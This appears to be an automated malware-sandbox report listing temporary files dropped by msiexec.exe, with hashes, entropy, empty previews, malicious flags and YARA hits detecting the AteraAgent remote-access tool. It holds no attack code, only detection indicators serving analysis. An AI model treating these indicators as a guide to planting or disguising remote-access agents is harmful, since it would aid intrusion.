                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF2524EE2A90E99532.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF252C2B21BDA64E4E.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.08390542666500003
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOC+Yoe7CGuNQ/am2oIlt4Vky6lwt/:2F0i8n0itFzDHF6oe7tuYaBoITw1
                                                                                                                                                                                                                                        MD5:967B21478EDAA6E01AEDBD156BF5AC8E
                                                                                                                                                                                                                                        SHA1:0F6092531F2B32F89BC65AB90F355A787BF54756
                                                                                                                                                                                                                                        SHA-256:9BA0E7A77DA3B151A8CC31CE5AD00B1DFD17C5231780165D60CDD723235D7D4A
                                                                                                                                                                                                                                        SHA-512:4164850335D70EBA5EA7768851ECC15D804A8753EB92CA161C4296A592C126732B48774B488AFC4A7753777FD95B9321A155F1B9B87A93CE7F7D7FFF431880EB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF25FF7DC86312E06B.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.620433948434433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4D8PhPuRc06WXJEnT53DeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:4qhP1HnTpD7IciuBulU4
                                                                                                                                                                                                                                        MD5:DC61A0CDBF3DD456206101D76350E716
                                                                                                                                                                                                                                        SHA1:AD3416020998E9135D0A4A45D4F483B3C805D880
                                                                                                                                                                                                                                        SHA-256:63CF342EBFAE1EF9C46D60E0719A0E42B82E06E77EF89D011E07229AFE78CFB5
                                                                                                                                                                                                                                        SHA-512:B2F8C8055E6491B61E08ED5DE897E711CFA763F2843FBBBFDC3E3668D4E34E39A8A91D486A9B6D1C3F6603788F1CF759396E9D27E09B9D7A147B56FEB6704B3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF25FF7DC86312E06B.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF27234B0283C1B5F8.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF27FAC149DBAAC356.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF2E37A55D12539DCB.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF2E6CEB805A1AD5D7.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.15760192660924888
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:6qoWEuSsndddPSjndddwEqdGUDjzbQZGdfqq:6qoW9f3DfwKfqq
                                                                                                                                                                                                                                        MD5:C73DE09CEC28648CDAB71647DDE7D7BC
                                                                                                                                                                                                                                        SHA1:3C0F0570723C17360D9C75964C7F0DBA60685692
                                                                                                                                                                                                                                        SHA-256:16EE4B3E50B2FC8E7544F05BE1410BFCA217F3BBE909F9BE9A82BE9ED23722F0
                                                                                                                                                                                                                                        SHA-512:78DE83997C189524B0FD1DF62208DB7FF9532A0858613F2774B2EADB43AE5DCB98A686CBD61BBE8A297A9DB3C42A78E41F4330146EE0B6A081B9F32255E24842
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF2E6CEB805A1AD5D7.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF2E6CEB805A1AD5D7.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF2EDFF286E3DEBD15.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF348ED03FA66DBE99.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF37AF000510E2973B.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF37AF000510E2973B.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4182C1E60B0AB674.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220900366703216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhcuRc06WXJEnT5HDSqISoedGPdGTbaStedGPdGTn:9hc1HnT5DnIDD
                                                                                                                                                                                                                                        MD5:DA248B97146E4F5338555E5775646CEF
                                                                                                                                                                                                                                        SHA1:F5E887A3D1F69E7306EC6A6CC10106B3904712CF
                                                                                                                                                                                                                                        SHA-256:6559352E6BE0D37D4B95CBB2B565FD8BED3F975EAE2775884D460A6815A83D28
                                                                                                                                                                                                                                        SHA-512:9F1FDFB298D4F6BBA3943113D9069155A40E7AEF3F52A21DED2075DF91CC8AE4A550D7E9A33AB5AF950A026DE4569BCB498F3F169562B83C6F82A5F4BB794966
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF41CA58E5D53CE8A0.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF454FE3DE1E4F4BC4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF454FE3DE1E4F4BC4.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF47CBA181FC761D28.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF47CBA181FC761D28.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF47F9F8C35B0B61B8.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.15846884213934206
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:oaEuSsndd4dASjndd4d/EqdGUDjzbQ2JNd/8:oa/93Dfxf/8
                                                                                                                                                                                                                                        MD5:29B2E2CEFA994CFA582C6157F89A3B17
                                                                                                                                                                                                                                        SHA1:AA884F6C198826FC12F4EA96A374F4EE9A3E1D8F
                                                                                                                                                                                                                                        SHA-256:3CEC7CD33FF4E40517822ABBEDC59B8DE5D4563819F0008C9A026E3BAA69B02D
                                                                                                                                                                                                                                        SHA-512:EC0BC1CB3725E80A832B8D55FC249C0971F73DB422BEC91C6AAD1812AC4AE316B20D87CE982FDE031592B3A008DE91819B6DCB8A9A017882195C45A697CEEFC2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF47F9F8C35B0B61B8.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF47F9F8C35B0B61B8.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4B59CC9FA621FDE4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF4E49B63DDB425763.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4E49B63DDB425763.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4E49B63DDB425763.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF51A85FC34D65A86A.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07896689188905408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOAYJFROO+G9IbSVky6l/X:2F0i8n0itFzDHF7DRONN/X
                                                                                                                                                                                                                                        MD5:FC085151AC0BD68B194323C7908CA49A
                                                                                                                                                                                                                                        SHA1:4A5C9448EFDD9AD87B9C7843D2C6519C24714B08
                                                                                                                                                                                                                                        SHA-256:05E716D0BC6AE5C79D82BB4532AB460E0C341F227B47F84FEEF5B3831C145CD6
                                                                                                                                                                                                                                        SHA-512:6044C1DF5E4161E65DB91D072B7CFA8CED9556741BBF6322CBB2DF4498CBD1B6E23CA49DD438AC7BCFF5B9C6347D664F2329E98F0BD684D303C9806BB184B38D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF51C4516F67FD4305.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.077966497703753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1LtCmOuPrfkiVky6l51:2F0i8n0itFzDHFzTPrfWr
                                                                                                                                                                                                                                        MD5:785EA75A2FB1DB6D9155B28A1291DAF3
                                                                                                                                                                                                                                        SHA1:6B86F7E077D0A8823383FBB776313FEDB17BFDEA
                                                                                                                                                                                                                                        SHA-256:BCD727E77C067BD5A31C13E8024F00ED60381D9AB725CAE2E6777A5708C9DDE0
                                                                                                                                                                                                                                        SHA-512:1834BBF627951711C96708EE7AA4B6C069055E832C717561DC77592E68EFB93E65FE825A5D3D13859057C93BE96CC12701D725491C4CFC49A4EE4FD40942E72A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF531938022DAAD71B.TMP

                                                                                                                                                                                                                                        Download File
